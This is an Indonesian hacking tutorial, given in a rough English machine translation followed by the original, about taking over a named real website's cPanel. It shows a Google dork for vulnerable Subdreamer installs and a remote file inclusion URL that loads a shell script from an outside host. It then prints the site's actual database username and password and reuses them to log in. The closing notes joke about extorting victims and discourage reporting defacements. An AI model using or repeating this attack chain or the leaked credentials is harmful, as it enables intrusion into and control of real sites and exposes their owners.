Hacking Cpanel Dengan C99
Oleh
chmood
Is it Cpanel? Cpanel is the center of management web site, CPanel or fancy term Control Panel is where web admin for setting up full and the control of the web to be made or the term is cpanel = house is still empty yet nothing, well that's where it later will be filled furnishings to complement the contents of the house, Cpanel same as home, and furniture can be categorized as a web script, script mail, scripts MySql, etc. Does cPanel is so important and valuable? Yups a good question the answer is YES, because if cpanel in a site can be entered by the hacker it can be ascertained that the target web are in control of the hacker [sorry I'm not a hacker J] or if dilogikakan same if the home we succeed in kuasain others then certainly the other person can enter at any time to our house. but are easy to house our people can go home us while our house there is a security that is KEY, Yups tantamount to cpanel is not as easy as we imagine due to enter the area cpanel requires a key that username and password, if not then you certainly will not be able to entry into the cpanel area. Our logic is clear enough to think, so now back again to the subject matter, the author will explain the takeover cpanel web against targets wearing the fault of the script logic programming and the mistakes of the web admin, J
btw we start authors will take a bug in php script with the brand 'subdreamer' [could diliat in www.subdreamer.com], bugs are: /skins/advanced/advanced2.php?pluginpath[0]= to file the problem is advanced2.php, we will try to find a target by wearing uncle google.com with the syntax: inurl: 'skins / advanced / advanced1.php?', the authors take the example of overseas sites [previously been members announcing their mail to the appropriate bug ethical hacker] J, namely: http://www.cafesjakie.nl
We are trying to do penetration to the target site, using phpshell it will get results:
http://www.cafesjakie.nl/skins/advanced/advanced2.php?pluginpath[0]= http://ernigalak.t35.com/mama.txt? It will be the result appears as below:
Apakah Cpanel itu? Cpanel adalah merupakan pusat dari manajemen web site, CPanel atau istilah kerennya Control Panel adalah tempat dimana admin web untuk melakukan setting penuh dan control terhadap web yang akan dibuat atau istilahnya adalah CPANEL = Rumah yang masih kosong yang belum ada apa-apanya, nah disanalah nanti akan diisi perabotan-perabotan untuk melengkapi isi rumah tersebut, Cpanel sama juga seperti rumah, dan perabotannya bisa dikategorikan sebagai script web, script mail, script MySql, dll. Apakah CPANEL itu begitu penting dan berharga ? yups pertanyaan yang bagus jawabannya adalah IYA, karena bila CPANEL dalam suatu Web bisa dimasuki oleh para hacker maka dapat dipastikan bahwa web target berada dalam control sang hacker [ maaf saya bukan hacker J ] atau bila dilogikakan sama saja bila rumah kita berhasil di kuasain orang lain maka dipastikan orang lain tersebut bisa masuk kapan saja terhadap rumah kita. tapi apakah mudah rumah kita orang lain bisa masuk kerumah kita sedangkan rumah kita ada pengaman yaitu KUNCI, yups sama saja dengan CPANEL tidak semudah yang kita bayangkan karena untuk masuk ke area CPANEL membutuhkan kunci yaitu Username dan password, bila tidak maka anda dipastikan tidak akan bisa masuk ke dalam area CPANEL tersebut. Cukup jelas logika kita untuk berpikir , so sekarang kembali lagi ke pokok permasalahannya, penulis akan menerangkan pengambilan alih cpanel terhadap web target memakai kesalahan dari script logika pemograman dan kesalahan dari admin web tersebut, J
btw kita mulai penulis akan ambil suatu bug yang ada di script php dengan merk βsubdreamerβ [ bisa diliat diwww.subdreamer.com ], bug yang ada adalah : /skins/advanced/advanced2.php?pluginpath[0]= dengan file yang bermasalah adalah advanced2.php, kita akan coba cari target dengan memakai paman google.comdengan syntax : inurl:β skins/advanced/advanced1.php?β, penulis ambil contoh situs luar negeri [ sebelumnya sudah member tahukan bug ke mail mereka sesuai dengan etika hacker ] J yaitu : http://www.cafesjakie.nl
Kita coba lakukan penetrasi terhadap situs target, dengan memakai phpshell maka akan didapat hasil :
http://www.cafesjakie.nl/skins/advanced/advanced2.php?pluginpath[0]= http://ernigalak.t35.com/mama.txt? Maka akan Nampak hasil seperti dibawah ini :
Ok's we managed to get through the back [backdoor] but we have not got access to major [cpanel] can only be entered through the back door, so we try to find where the location of the main access [cpanel], note one by one the existing file, we can see at the top of the file phpshell us
Okβs kita berhasil masuk lewat belakang [ backdoor ] tetapi kita belum mendapat akses utama [ cpanel ] hanya bisa masuk lewat pintu belakang, so kita coba cari dimana letak akses utama [ cpanel ], perhatikan satu persatu file yang ada, kita bisa liat di atas file phpshell kita
That the target was in position safe-mode: OFF, and there we can see uid: 65534 (nobody) gid = 65534 (nobody) groups = 65534 (nobody) by the user: gbremmer, good a good start for us trying to find access cpanel web this target [if not understand uid, gid, groups can learn the OS is based on open source like Linux, I love linux], further consider the above there is file / home / gremmer / public_html / skins / advanced, we will try gain access to cpanel try to go to the main page of the target web, click the folder public_html or if you are a web admin, folder public_html = www, then it will get the results below:
Bahwa target berada di posisi safe-mode : OFF, dan disana kita bisa liat uid:65534(nobody), gid=65534(nobody), groups=65534(nobody) dengan user : gbremmer, good awal yang bagus untuk kita coba cari akses cpanel pada web target tersebut [bila belum mengerti akan uid,gid,groups bisa mempelajari OS berbasis open Source seperti LInUX, I love linux ], lanjut perhatikan di atas disana ada file /home/gremmer/public_html/skins/advanced, kita akan coba mendapatkan akses cpanel coba masuk ke halaman utama web target tersebut , klik folder public_html atau bila anda seorang admin web ,folder public_html = www , maka akan didapat hasil di bawah ini :
Look carefully at these folders, we would think logically that to connect the database requires a username and password, usually the location of both are in the file config.php, configuration.php, koneksi.php [depending on the maker of the script], the authors try we will click on the folder includes [usually default location in the script subdreamer config.php in the includes folder], then it will get results:
Perhatikan dengan seksama folder-folder tersebut, kita akan berpikir secara logika bahwa untuk menghubungkan database memerlukan suatu username dan password, biasanya letak keduanya berada dalam file config.php, configuration.php, koneksi.php [ tergantung dari pembuat script tersebut ], penulis coba kita akan klik folder includes [ biasanya secara default letak config.php di script subdreamer ada di dalam folder includes], maka akan didapat hasil :
Note that there is a second file config.php and config.php.new, btw we can see its 2nd, only difference is that his problem byte [possibility config.php.new only to update only], then klikconfig.php will be the result:
Perhatikan disana ada 2 file yaitu config.php dan config.php.new, btw kita bisa liat ke-2 nya, hanya ada perbedaannya yaitu masalah byte βnya [ kemungkinan config.php.new hanya untuk update saja ], klikconfig.php maka akan didapat hasil :
Blah noticed again in the config.php file we can see the complete user databse with passwornya, Only here we are not going to get into that database because we will try to gain access to cpanel web main targets, look carefully at $ dbname = gbremmer_subdreamer
$ dbusername = gbremmer_subdrea, so logically gbremmer is the name of that user and behind him is the default name of hosting, and note once again file $ dbpassword = hiervomgb, is from the user's password is to enter into the Web database targets, stop, question whether we cpanel could get into those targets? good question, here the author would invite you to think logically, do you ever feel safe to carry out activities in cyberspace [internet]? To the layman maybe this is a stupid question, maybe people will think will be safe and comfortable for the business world of the Internet [nearly 80% who said so, so as to affairs password is only one password for many purposes] J, because we think so then where lies fault of our own [never want to know for security affairs in the internet], so back to the root of the problem, we would think the reverse of most laymen, we will try to use the user name: gbremmer and password: hiervomgb to get the main access from cpanel targets The.
Let's open the URL: http://www.cafesjakie.nl/cpanel, clay cpanel pages protected by user name and password,
Blah perhatikan lagi didalam file config.php kita bisa melihat databse user lengkap dengan passwornya , Cuma disini kita tidak akan masuk ke dalam database tersebut karena kita akan mencoba mendapatkan akses utama yaitu cpanel web target, perhatikan dengan seksama di $dbname = gbremmer_subdreamer
$dbusername = gbremmer_subdrea, so secara logika gbremmer adalah nama dari user tersebut dan dibelakangnya adalah default nama dari hosting tersebut, dan perhatikan sekali lagi file $dbpassword = hiervomgb, merupakan dari password user tersebut untuk masuk kedalam database web target, stop, pertanyaannya apakah kita bisa masuk ke cpanel target tersebut ? pertanyaan yang bagus, disini penulis akan mengajak anda berpikir secara logika, pernahkah anda merasa aman untuk melakukan aktivitas di dunia maya [ internet ]? Untuk orang awam mungkin ini adalah pertanyaan yang bodoh, mungkin orang akan berpikir akan aman dan nyaman untuk urusan dunia internet [ hampir 80 % yang mengatakan demikian, sehingga untuk urusan password hanya satu password untuk banyak keperluan ] J, karena kita berpikiran begitu maka disinilah letak kesalahan dari kita sendiri [ tidak pernah mau tahu untuk urusan keamanan dalam internet ], so kembali ke akar permasalahannya, kita akan berpikir terbalik dari kebanyakan orang awam , kita akan coba memakai user name : gbremmer dan password : hiervomgb untuk mendapatkan akses utama dari cpanel target tersebut.
Mari kita buka URL : http://www.cafesjakie.nl/cpanel, liat halaman cpanel terproteksi oleh user name dan password ,
Confused right? J, we will try to enter the username and password that we can from the config.php file
Bingung kan ? J, kita akan coba memasukkan username dan password yang kita dapat dari file config.php
Blar liatlah we can enter the target cpanel, it can perform full admin control terhadapa is only to capitalize logic without having to laboriously J for wearing an error of logic programming script and from the admin [when the writer is also one of the web admin diwww.sekuritionline.net ]
Blar liatlah kita dapat memasuki cpanel target tersebut, dapat secara full melakukan control terhadapa admin tersebut hanya dengan bermodalkan logika tanpa harus susah payah J karena memakai kesalahan dari logika script pemograman dan dari admin tersebut [padahal penulis juga salah satu admin web diwww.sekuritionline.net ]
Note:
- Learning to be a hacker is something fun that is difficult is ethics -nya- - When successfully entered the target web to try to let them know the relevant parties in order to do a patch on the web [all requested donation via e-gold] J xixixixiix
- Make hacking is art do not destroy [except if trapped] J just kidding J
- Embed to ourselves that for the virtual world affairs ga guarantee pure 100% safe, Xixi so remember the motto of the SO team [Secure Nothing in the world or in this world nothing is safe or in the sky there is heaven] J
- Make learning to hit its web admin when hit deface ga not reported to the authorities [ntar instead ngeluarin much money JJJ
- To do the admin always patch updates automatically or manually, and do data backup web teraturJ] we should be grateful that the web we are reminded by the hackers, [instead of being angry - angry and talking on TV -TV] that web price is above 200 million could be said to be safe [author also admin web tablets ntar in protest]
Greatz: Allah that gives life and death, My heart Erniku dear [uda officially became the wife] hope a speedy recovery would have a baby neh gue J, colleagues in SO te @ m, Bastard Crew, adhietslank, thesims, fabricate, Jayoes, a -tech, jantap, babypunk, Lieutenant, k1n9kong, setiawan, stove ^ meleduk, kabrut, saleho [rahmad pious], pomponk, blindboy, dave, Sonix, ariee, tommy ^ singers, Orgil, Hilda ^ inside, Rini, or the ga can mention [thanks all who participated in the summit digaht SO], all people underground, channel Hacker, Cracker, Carder, in Dalnet, mildnet, realunix, thanks upon learning J
Note :
β Belajar menjadi hacker adalah sesuatu yang menyenangkan yang susah adalah etika βnya- β Bila berhasil memasuki web target usahakan untuk memberi tahukan ke pihak yang terkait agar dapat dilakukan patch terhadap web tersebut [ sekalian minta donasi via e-gold ] J xixixixiix
β Jadikan hacking is art jangan merusak [ kecuali kalo kepepet ]J just kidding J
β Tanamkan ke diri kita sendiri bahwa untuk urusan dunia maya ga menjamin pure 100% aman, xixi jadi inget semboyan S-O team [ Nothing Secure in The world or Di dunia ini tidak ada yang aman or di atas langit masih ada langit ]J
β Jadikan pembelajaran untuk admin web bila kena webnya kena Deface ga usah lapor ke pihak berwenang [ ntar malah ngeluarin duit banyak JJJ
β Untuk admin selalu lakukan update patch secara otomatis atau manual, serta lakukan backup data web secara teraturJ ] seharusnya kita berterima kasih bahwa web kita diingatkan oleh para hacker tersebut, [ bukannya marah β marah dan ngomong di TV βTV ] bahwa web yang harganya diatas 200 juta bisa dikatakan aman [ penulis juga admin web loh ntar pada protes ]
Greatz : Allah yang member Hidup dan Matiku, My heart Erniku sayang [ uda resmi jadi istri ] moga cepat sembuh mau punya momongan neh gue J, rekan-rekan di S-O te@m, Bajingan Crew, adhietslank, thesims, Ngarang, Jayoes, a-tech, jantap, babypunk, letjen, k1n9kong, setiawan, kompor^meleduk,kabrut, saleho [ rahmad soleh ], pomponk ,blindboy,dave,sonix, ariee,tommy^pengamen, Orgil, Hilda^inside, Rini, or yang ga bisa disebutkan satu persatu [ makasih semua yang ikut digaht S-O di puncak ], all underground people, channel Hacker, Cracker, Carder, yang ada di Dalnet, mildnet, realunix, thanks atas pembelajarannya J
No Greatz : Para KKN yang membuat bangsa kita menderita.
Penulis bukan hacker hanya senang / hobby untuk urusan dunia underground J
Sumber : [ Sekuritionline.net ]
Komentar
